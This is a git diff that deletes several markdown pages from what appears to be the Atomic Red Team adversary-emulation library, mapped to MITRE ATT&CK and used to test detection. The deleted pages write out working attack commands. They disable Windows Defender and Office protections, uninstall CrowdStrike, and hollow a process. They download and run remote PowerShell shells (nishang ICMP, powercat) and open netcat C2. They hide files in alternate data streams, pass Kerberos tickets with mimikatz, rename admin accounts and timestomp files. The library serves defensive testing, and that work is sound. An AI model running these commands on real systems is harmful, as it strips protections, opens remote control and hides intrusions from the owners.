-## Atomic Test #18 - Tamper with Windows Defender Registry
-Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
-grayed out and have no info.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
-```
-
-#### Cleanup Commands:
-```powershell
-Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #19 - Disable Microft Office Security Features
-Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
-show any warning before editing the document.
-
-
-https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
-New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
-New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings"
-Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #20 - Remove Windows Defender Definition Files
-Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
-On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
-command will say completed.
-
-https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #21 - Stop and Remove Arbitrary Security Windows Service
-Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| service_name | The name of the service to remove | String | McAfeeDLPAgentService|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Stop-Service -Name #{service_name}
-Remove-Service -Name #{service_name}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #22 - Uninstall Crowdstrike Falcon on Windows
-Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| falcond_path | The Crowdstrike Windows Sensor path. The Guid always changes. | path | C:&#92;ProgramData&#92;Package Cache&#92;{7489ba93-b668-447f-8401-7e57a6fe538d}&#92;WindowsSensor.exe|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1090.md b/Atomic_Threat_Coverage/Triggers/T1090.md
deleted file mode 100644
index cded522..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1090.md
+++ /dev/null
@@ -1,89 +0,0 @@
-# T1090 - Connection Proxy
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1090)
-<blockquote>Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.
-
-External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the internet and then the proxy would forward communications to the C2 server.
-
-Internal connection proxies can be used to consolidate internal connections from compromised systems. Adversaries may use a compromised internal system as a proxy in order to conceal the true destination of C2 traffic. The proxy can redirect traffic from compromised systems inside the network to an external C2 server making discovery of malicious traffic difficult. Additionally, the network can be used to relay information from one system to another in order to avoid broadcasting traffic to all systems.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Connection Proxy](#atomic-test-1---connection-proxy)
-
-- [Atomic Test #2 - portproxy reg key](#atomic-test-2---portproxy-reg-key)
-
-
-<br/>
-
-## Atomic Test #1 - Connection Proxy
-Enable traffic redirection.
-
-Note that this test may conflict with pre-existing system configuration.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080|
-| proxy_scheme | Protocol to proxy (http or https) | string | http|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-export #{proxy_scheme}_proxy=#{proxy_server}
-```
-
-#### Cleanup Commands:
-```sh
-unset http_proxy
-unset https_proxy
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - portproxy reg key
-Adds a registry key to set up a proxy on the endpoint at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4
-Upon execution there will be a new proxy entry in netsh
-netsh interface portproxy show all
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| listenport | Specifies the IPv4 port, by port number or service name, on which to listen. | string | 1337|
-| connectport | Specifies the IPv4 port, by port number or service name, to which to connect. If connectport is not specified, the default is the value of listenport on the local computer. | string | 1337|
-| connectaddress | Specifies the IPv4 address to which to connect. Acceptable values are IP address, computer NetBIOS name, or computer DNS name. If an address is not specified, the default is the local computer. | string | 127.0.0.1|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress}
-```
-
-#### Cleanup Commands:
-```powershell
-netsh interface portproxy delete v4tov4 listenport=#{listenport}
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1093.md b/Atomic_Threat_Coverage/Triggers/T1093.md
deleted file mode 100644
index f42f40a..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1093.md
+++ /dev/null
@@ -1,48 +0,0 @@
-# T1093 - Process Hollowing
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1093)
-<blockquote>Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis. (Citation: Leitch Hollowing) (Citation: Endgame Process Injection July 2017)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Process Hollowing using PowerShell](#atomic-test-1---process-hollowing-using-powershell)
-
-
-<br/>
-
-## Atomic Test #1 - Process Hollowing using PowerShell
-This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent.
-Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1)
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| parent_process_name | Name of the parent process | string | explorer|
-| sponsor_binary_path | Path of the sponsor binary (executable that will host the binary) | string | C:&#92;Windows&#92;System32&#92;calc.exe|
-| hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | string | C:&#92;Windows&#92;System32&#92;cmd.exe|
-| spawnto_process_name | Name of the process to spawn | string | calc|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-. $PathToAtomicsFolder\T1093\src\Start-Hollow.ps1
-$ppid=Get-Process #{parent_process_name} | select -expand id
-Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
-```
-
-#### Cleanup Commands:
-```powershell
-Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1095.md b/Atomic_Threat_Coverage/Triggers/T1095.md
deleted file mode 100644
index f94c1f0..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1095.md
+++ /dev/null
@@ -1,132 +0,0 @@
-# T1095 - Standard Non-Application Layer Protocol
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1095)
-<blockquote>Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. (Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
-
-ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - ICMP C2](#atomic-test-1---icmp-c2)
-
-- [Atomic Test #2 - Netcat C2](#atomic-test-2---netcat-c2)
-
-- [Atomic Test #3 - Powercat C2](#atomic-test-3---powercat-c2)
-
-
-<br/>
-
-## Atomic Test #1 - ICMP C2
-This will attempt to  start C2 Session Using ICMP. For information on how to set up the listener
-refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| server_ip | The IP address of the listening server | string | 127.0.0.1|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
-Invoke-PowerShellIcmp -IPAddress #{server_ip}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Netcat C2
-Start C2 Session Using Ncat
-To start the listener on a Linux device, type the following: 
-nc -l -p <port>
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| server_ip | The IP address or domain name of the listening server | string | 127.0.0.1|
-| server_port | The port for the C2 connection | integer | 80|
-| ncat_exe | The location of ncat.exe | path | $env:TEMP&#92;T1095&#92;nmap-7.80&#92;ncat.exe|
-| ncat_path | The folder path of ncat.exe | path | $env:TEMP&#92;T1095|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-cmd /c #{ncat_exe} #{server_ip} #{server_port}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: ncat.exe must be available at specified location (#{ncat_exe})
-##### Check Prereq Commands:
-```powershell
-if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null
-$parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip"
-Invoke-WebRequest  "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath"
-  Expand-Archive $zippath $parentpath -Force
-  $unzipPath = Join-Path $parentPath "nmap-7.80"
-if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | ?{$_.DisplayName -like "Microsoft Visual C++*"}) ) {
-  Start-Process (Join-Path $unzipPath "vcredist_x86.exe")
-}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Powercat C2
-Start C2 Session Using Powercat
-To start the listener on a Linux device, type the following: 
-nc -l -p <port>
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| server_ip | The IP address or domain name of the listening server | string | 127.0.0.1|
-| server_port | The port for the C2 connection | integer | 80|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
-powercat -c #{server_ip} -p #{server_port}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1096.md b/Atomic_Threat_Coverage/Triggers/T1096.md
deleted file mode 100644
index fae1565..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1096.md
+++ /dev/null
@@ -1,94 +0,0 @@
-# T1096 - NTFS File Attributes
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1096)
-<blockquote>Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
-
-Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Alternate Data Streams (ADS)](#atomic-test-1---alternate-data-streams-ads)
-
-- [Atomic Test #2 - Store file in Alternate Data Stream (ADS)](#atomic-test-2---store-file-in-alternate-data-stream-ads)
-
-
-<br/>
-
-## Atomic Test #1 - Alternate Data Streams (ADS)
-Execute from Alternate Streams
-
-[Reference - 1](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)
-
-[Reference - 2](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/)
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| path | Path of ADS file | path | c:&#92;ADS&#92;|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
-extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
-findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
-certutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1096/src/test.ps1 c:\temp:ttt
-makecab #{path}\autoruns.exe #{path}\cabtest.txt:autoruns.cab
-print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe
-reg export HKLM\SOFTWARE\Microsoft\Evilreg #{path}\file.txt:evilreg.reg
-regedit /E #{path}\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
-expand \\webdav\folder\file.bat #{path}\file.txt:file.bat
-esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Store file in Alternate Data Stream (ADS)
-Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
-Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| payload_path | Path of file to hide in ADS | path | c:&#92;windows&#92;system32&#92;cmd.exe|
-| ads_file_path | Path of file to create an ADS under | path | C:&#92;Users&#92;Public&#92;Libraries&#92;yanki&#92;desktop.ini|
-| ads_name | Name of ADS | string | desktop.ini|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-if (!(Test-Path C:\Users\Public\Libraries\yanki -PathType Container)) {
-    New-Item -ItemType Directory -Force -Path C:\Users\Public\Libraries\yanki
-    }
-Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1097.md b/Atomic_Threat_Coverage/Triggers/T1097.md
deleted file mode 100644
index 2785fca..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1097.md
+++ /dev/null
@@ -1,45 +0,0 @@
-# T1097 - Pass the Ticket
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1097)
-<blockquote>Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
-
-In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access. (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket)
-
-Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks)
-
-Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Mimikatz Kerberos Ticket Attack](#atomic-test-1---mimikatz-kerberos-ticket-attack)
-
-
-<br/>
-
-## Atomic Test #1 - Mimikatz Kerberos Ticket Attack
-Similar to PTH, but attacking Kerberos
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| user_name | username | string | Administrator|
-| domain | domain | string | atomic.local|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-mimikatz # kerberos::ptt #{user_name}@#{domain}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1098.md b/Atomic_Threat_Coverage/Triggers/T1098.md
deleted file mode 100644
index 60057fc..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1098.md
+++ /dev/null
@@ -1,60 +0,0 @@
-# T1098 - Account Manipulation
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1098)
-<blockquote>Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to subvert password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.
-
-### Exchange Email Account Takeover
-
-The Add-MailboxPermission PowerShell cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission) This command can be run, given adequate permissions, to further access granted to certain user accounts. This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)
-
-### Azure AD
-
-In Azure, an adversary can set a second password for Service Principals, facilitating persistence.(Citation: Blue Cloud of Death)
-
-### AWS
-
-AWS policies allow trust between accounts by simply identifying the account name. It is then up to the trusted account to only allow the correct roles to have access.(Citation: Summit Route Advanced AWS policy auditing)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Admin Account Manipulate](#atomic-test-1---admin-account-manipulate)
-
-
-<br/>
-
-## Atomic Test #1 - Admin Account Manipulate
-Manipulate Admin Account Name
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-$x = Get-Random -Minimum 2 -Maximum 9999
-$y = Get-Random -Minimum 2 -Maximum 9999
-$z = Get-Random -Minimum 2 -Maximum 9999
-$w = Get-Random -Minimum 2 -Maximum 9999
-Write-Host HaHaHa_$x$y$z$w
-
-$hostname = (Get-CIMInstance CIM_ComputerSystem).Name
-
-$fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name
-
-foreach($member in $fmm) {
-    if($member -like "*Administrator*") {
-        Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w"
-        Write-Host "Successfully Renamed Administrator Account on" $hostname
-        }
-    }
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1099.md b/Atomic_Threat_Coverage/Triggers/T1099.md
deleted file mode 100644
index 5d8ef07..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1099.md
+++ /dev/null
@@ -1,355 +0,0 @@
-# T1099 - Timestomp
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1099)
-<blockquote>Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Set a file's access timestamp](#atomic-test-1---set-a-files-access-timestamp)
-
-- [Atomic Test #2 - Set a file's modification timestamp](#atomic-test-2---set-a-files-modification-timestamp)
-
-- [Atomic Test #3 - Set a file's creation timestamp](#atomic-test-3---set-a-files-creation-timestamp)
-
-- [Atomic Test #4 - Modify file timestamps using reference file](#atomic-test-4---modify-file-timestamps-using-reference-file)
-
-- [Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell](#atomic-test-5---windows---modify-file-creation-timestamp-with-powershell)
-
-- [Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell](#atomic-test-6---windows---modify-file-last-modified-timestamp-with-powershell)
-
-- [Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell](#atomic-test-7---windows---modify-file-last-access-timestamp-with-powershell)
-
-- [Atomic Test #8 - Windows - Timestomp a File](#atomic-test-8---windows---timestomp-a-file)
-
-
-<br/>
-
-## Atomic Test #1 - Set a file's access timestamp
-Stomps on the access timestamp of a file
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-touch -a -t 197001010000.00 #{target_filename}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Set a file's modification timestamp
-Stomps on the modification timestamp of a file
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-touch -m -t 197001010000.00 #{target_filename}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Set a file's creation timestamp
-Stomps on the create timestamp of a file
-
-Setting the creation timestamp requires changing the system clock and reverting.
-Sudo or root privileges are required to change date. Use with caution.
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-NOW=$(date)
-date -s "1970-01-01 00:00:00"
-touch #{target_filename}
-date -s "$NOW"
-stat #{target_filename}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Modify file timestamps using reference file
-Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file.
-
-This technique was used by the threat actor Rocke during the compromise of Linux web servers.
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| reference_file_path | Path of reference file to read timestamps from | Path | /bin/sh|
-| target_file_path | Path of file to modify timestamps of | Path | /opt/filename|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-touch -acmr #{reference_file_path} #{target_file_path}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell
-Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT.
-To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_path | Path of file to change creation timestamp | Path | $env:TEMP&#92;T1099_timestomp.txt|
-| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" }
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item #{file_path} -Force -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: A file must exist at the path (#{file_path}) to change the creation time on
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{file_path}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Path #{file_path} -Force | Out-Null
-Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell
-Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT.
-To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_path | Path of file to change modified timestamp | Path | $env:TEMP&#92;T1099_timestomp.txt|
-| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" }
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item #{file_path} -Force -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: A file must exist at the path (#{file_path}) to change the modified time on
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{file_path}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Path #{file_path} -Force | Out-Null
-Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell
-Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT.
-To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_path | Path of file to change last access timestamp | Path | $env:TEMP&#92;T1099_timestomp.txt|
